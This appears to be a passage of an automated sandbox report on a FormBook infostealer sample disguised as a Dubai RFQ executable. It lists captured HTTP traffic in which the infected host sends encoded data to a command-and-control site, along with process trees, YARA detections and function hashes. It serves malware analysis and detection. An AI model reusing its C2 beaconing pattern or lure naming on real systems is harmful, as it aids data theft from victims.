Oct 11, 2024 10:06:16.851497889 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:06:16 GMT Server: Apache Content-Length: 4395 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester \| 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
Oct 11, 2024 10:06:16.851618052 CEST	1289	IN	Data Raw: 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 Data Ascii: f lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css
Oct 11, 2024 10:06:16.851633072 CEST	1289	IN	Data Raw: 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 32 3c 2f Data Ascii: ><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03</a></li> </ul> </li> <li><a href="contact.html">Cont
Oct 11, 2024 10:06:16.851644039 CEST	673	IN	Data Raw: 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 Data Ascii: form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a class="icon-1" href

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.11.20	49910	63.250.47.57	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:06:19.361612082 CEST	1289	OUT	POST /q7ah/ HTTP/1.1 Host: www.numbox.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.numbox.live Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.numbox.live/q7ah/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 53 7a 56 50 53 77 56 65 4e 76 72 32 53 2f 55 57 47 49 53 2b 33 69 74 46 6a 69 45 42 70 4b 31 52 61 30 6b 7a 39 66 79 79 75 6c 33 36 77 46 63 39 51 6c 6e 6a 58 43 69 55 52 67 70 38 45 66 31 4a 75 55 56 6e 5a 6f 6c 61 4f 56 51 4d 31 36 6a 38 46 6b 4b 69 72 79 69 37 55 52 57 48 41 51 35 71 75 69 62 4e 47 6f 56 5a 59 59 4b 4b 41 6d 76 41 71 2f 6a 30 6d 34 38 2b 45 79 50 38 34 55 6c 56 4b 68 6b 2f 77 4d 78 4e 49 30 4c 32 42 57 55 58 57 34 69 53 4b 43 36 61 78 79 6e 2f 52 67 65 70 6d 2b 72 32 63 75 30 37 2f 62 2b 2b 4f 6b 38 30 63 59 76 65 51 44 36 64 62 6c 68 71 79 58 46 30 4b 76 6c 4d 6b 54 57 6b 48 36 71 54 2f 45 79 72 65 37 31 58 2b 43 45 4a 38 33 4a 6e 72 57 6b 4b 6c 66 31 6d 65 79 50 6a 50 4f 65 44 65 46 67 62 59 52 59 66 56 59 7a 68 4e 37 37 58 79 64 73 5a 39 41 36 39 32 31 56 63 31 63 48 5a 4f 37 47 78 55 4f 72 49 70 41 4b 43 71 50 38 49 75 70 6c 39 39 64 77 66 46 7a 53 34 39 6b 35 72 57 37 49 78 4d 55 77 79 76 46 34 6b 52 31 6f 7a 50 2b 54 68 48 4e 42 77 77 4a 6d 50 38 72 6f 71 41 [TRUNCATED] Data Ascii: ATk=/SzVPSwVeNvr2S/UWGIS+3itFjiEBpK1Ra0kz9fyyul36wFc9QlnjXCiURgp8Ef1JuUVnZolaOVQM16j8FkKiryi7URWHAQ5quibNGoVZYYKKAmvAq/j0m48+EyP84UlVKhk/wMxNI0L2BWUXW4iSKC6axyn/Rgepm+r2cu07/b++Ok80cYveQD6dblhqyXF0KvlMkTWkH6qT/Eyre71X+CEJ83JnrWkKlf1meyPjPOeDeFgbYRYfVYzhN77XydsZ9A6921Vc1cHZO7GxUOrIpAKCqP8Iupl99dwfFzS49k5rW7IxMUwyvF4kR1ozP+ThHNBwwJmP8roqAIR2TiqQOF2b2kdR5LwN5k9xjKxuQV4uAcYDkGWR4NJbxm4/7zpaNplqYtQgHgYjQ3FFtbM5cVhIs1bmydiTqE8QrAoNCVW/cPPokAWgVxV9oLrAyYdoWL+TXSsMAaRtvpJxjicJDiw14IZZRkyKH+zj8T1soDDRjcfXbV+klacYsPykGspIaykANOkc8FjW/Ubb34a/6iZ8mxKm/P+Q9nX6/ddWyDJk2JjXffJOhZZe3+Qrr2y2/Xffvs+qUJBQGtcK1YCcI6UQFsW5t8CbPPF40V8y/PTl1TtPJackqcdbSiSBO6IK3Awuvy15TfUAhh1MaHN38VzwUJYdi3LEGY35NOADUi+9Vys8QG4
Oct 11, 2024 10:06:19.361659050 CEST	1289	OUT	Data Raw: 4d 49 4b 57 77 42 77 37 74 37 43 5a 37 31 57 30 66 35 4b 41 67 47 61 4e 46 78 6a 4c 44 44 31 73 6f 69 6a 37 65 52 74 6b 68 68 39 42 52 72 7a 33 6f 76 46 63 49 38 51 69 43 72 43 39 55 51 44 61 39 4e 2f 79 4e 77 32 73 6d 70 41 37 68 71 45 69 6b 6a Data Ascii: MIKWwBw7t7CZ71W0f5KAgGaNFxjLDD1soij7eRtkhh9BRrz3ovFcI8QiCrC9UQDa9N/yNw2smpA7hqEikjKgIWM+j0mktInqAx9mj2GeMpNx+79pJnFo5IgqDM+/1jhmXUseM0qydWPzC1ZENBxRNJuk+dcfmihLRLpvNQr1PR2QhJ+eAGK31bCPg+73ftNvV9wrOscfgVYHNXawqtYe4d645B5xQHcHV6f/ivTZc3c3sr16OAP
Oct 11, 2024 10:06:19.361713886 CEST	5156	OUT	Data Raw: 38 70 59 49 45 77 52 55 7a 6b 4f 53 37 48 64 32 61 7a 39 33 66 42 6e 4c 4f 67 63 38 57 51 65 6e 2b 70 57 42 2f 57 49 2b 42 41 51 73 45 2f 59 41 6e 2b 52 61 35 44 62 55 36 76 71 71 4f 33 6b 39 34 68 59 72 4f 46 75 56 59 66 64 5a 67 57 47 4b 72 52 Data Ascii: 8pYIEwRUzkOS7Hd2az93fBnLOgc8WQen+pWB/WI+BAQsE/YAn+Ra5DbU6vqqO3k94hYrOFuVYfdZgWGKrR8i3/iE9lAe90nuEEX/0yWJLEbOAmdTHsvkQXwdF2OaMzja+jEqfP9EmS25Mh+dgGD3Nl6NcGCyjHP976oGhW+HGh0NloZyt37rR3RyMG4+0CmgRCdY8ZZZEq01d2USOJB9Cw9xncNiHkeqSH6ryi3ykRYYNZFugQj
Oct 11, 2024 10:06:19.361879110 CEST	227	OUT	Data Raw: 32 75 48 6f 35 57 6a 6e 69 37 31 33 48 56 57 7a 71 6e 42 32 36 64 32 70 6f 43 4f 2b 7a 6e 46 79 34 6f 41 75 2b 6a 41 7a 37 32 42 6c 50 4d 36 58 42 2f 55 54 63 67 41 6a 48 58 49 75 79 54 77 72 76 62 4e 7a 79 72 6f 39 50 59 45 52 64 4c 71 36 72 6e Data Ascii: 2uHo5Wjni713HVWzqnB26d2poCO+znFy4oAu+jAz72BlPM6XB/UTcgAjHXIuyTwrvbNzyro9PYERdLq6rn/SL3JBOHYtKCCEuphaM9gyBEtlGw5mN0RrT1LoXvCN6PRoWnLN0SmjYx/TqVq8ZWysWCPONn1G/SmmxcyvjYwMzl7J1SULBZr4IsXD/qdszQ/fjN0V++koCaF7nJkIITihT1F+El/scVbQA==
Oct 11, 2024 10:06:19.543267012 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:06:19 GMT Server: Apache Content-Length: 4395 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester \| 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
Oct 11, 2024 10:06:19.543354034 CEST	1289	IN	Data Raw: 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 Data Ascii: f lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css
Oct 11, 2024 10:06:19.543476105 CEST	1289	IN	Data Raw: 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 32 3c 2f Data Ascii: ><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03</a></li> </ul> </li> <li><a href="contact.html">Cont
Oct 11, 2024 10:06:19.543579102 CEST	673	IN	Data Raw: 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 Data Ascii: form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a class="icon-1" href

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.11.20	49911	63.250.47.57	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:06:22.047156096 CEST	539	OUT	GET /q7ah/?ATk=yQb1MnoYePGa+D7HYXNMgCWfQwyPM5qgSNNB5eb+vdtsin1jnkdmik2CDVoWxFHrVuMckJ02SL88S12T7EptqLmfnh4CTyoL2s7wDlIiRZZ8USqQIrqm93w=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.numbox.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:06:22.217694044 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:06:22 GMT Server: Apache Content-Length: 4395 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester \| 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
Oct 11, 2024 10:06:22.217802048 CEST	1289	IN	Data Raw: 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 Data Ascii: dif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.goo
Oct 11, 2024 10:06:22.217817068 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 Data Ascii: <li><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03</a></li> </ul> </li> <li><a href="con
Oct 11, 2024 10:06:22.217828035 CEST	688	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 Data Ascii: </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a clas

Target ID:	0
Start time:	03:59:38
Start date:	11/10/2024
Path:	C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe"
Imagebase:	0xf0000
File size:	878'592 bytes
MD5 hash:	53770B8B5CD580EE1E3D41F7F1EEA3CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:59:51
Start date:	11/10/2024
Path:	C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe"
Imagebase:	0x950000
File size:	878'592 bytes
MD5 hash:	53770B8B5CD580EE1E3D41F7F1EEA3CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.109069478758.0000000001120000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.109069478758.0000000001120000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.109071309836.0000000001A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.109071309836.0000000001A90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:00:14
Start date:	11/10/2024
Path:	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe"
Imagebase:	0xea0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	04:00:15
Start date:	11/10/2024
Path:	C:\Windows\SysWOW64\write.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\write.exe"
Imagebase:	0xdd0000
File size:	10'240 bytes
MD5 hash:	3D6FDBA2878656FA9ECB81F6ECE45703
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.112736877355.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.112736877355.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.112736541282.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.112736541282.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	04:00:28
Start date:	11/10/2024
Path:	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe"
Imagebase:	0xea0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.113717742258.0000000001260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.113717742258.0000000001260000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	04:00:41
Start date:	11/10/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d4c50000
File size:	597'432 bytes
MD5 hash:	FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	17.6%
Total number of Nodes:	210
Total number of Limit Nodes:	12

Executed Functions

Function 068D0F34 Relevance: 6.9, Strings: 5, Instructions: 620
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H"r, xrefs: 068D3714
H"r, xrefs: 068D38E3
H"r, xrefs: 068D379B
H"r, xrefs: 068D3825
H"r, xrefs: 068D3681

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: H"r$H"r$H"r$H"r$H"r
API String ID: 0-3840589098
Opcode ID: 3ff838640e5ccc75a5ae610e8af76c3664fefb0a004fd767fc731ffed0d9c0d4
Instruction ID: 55354c1f0af3b3af96bb4f91526c410afad49aa1fffbcffd1169c2b79bc5fdbe
Opcode Fuzzy Hash: 3ff838640e5ccc75a5ae610e8af76c3664fefb0a004fd767fc731ffed0d9c0d4
Instruction Fuzzy Hash: 3B326F71E002148FEB94DFB8C850B6EBBF2AF85304F14806AD549EB385DB34AD45CBA5

Function 06D39278 Relevance: .6, Instructions: 622COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e8c35a54042eeac5e191a1965350e2a63c0749cdfa4e3de30e39e6a0d9e5b3
Instruction ID: f3ce9858cabee69270a7522d2fd8d9105a2717c251e4568cef0e40420abdfd50
Opcode Fuzzy Hash: 15e8c35a54042eeac5e191a1965350e2a63c0749cdfa4e3de30e39e6a0d9e5b3
Instruction Fuzzy Hash: AA329B71B012149FEB59DFA9C960BAEB7F6AF89304F144069E106EB3A0DB75ED01CB50

Function 068D30B0 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b4046636fe260de911bf39685f406bfd56fc169b235e544b3ea55507bee1c2
Instruction ID: b51a8c94ee21ad68417db23904012ff721702d527f8824a1cbbad7279e6f65a5
Opcode Fuzzy Hash: a9b4046636fe260de911bf39685f406bfd56fc169b235e544b3ea55507bee1c2
Instruction Fuzzy Hash: 94C16930E002188FDF95DFA9C88079DBBB2AF89310F14C1AAD459EB255DB74D985CFA1

Function 068D0F25 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
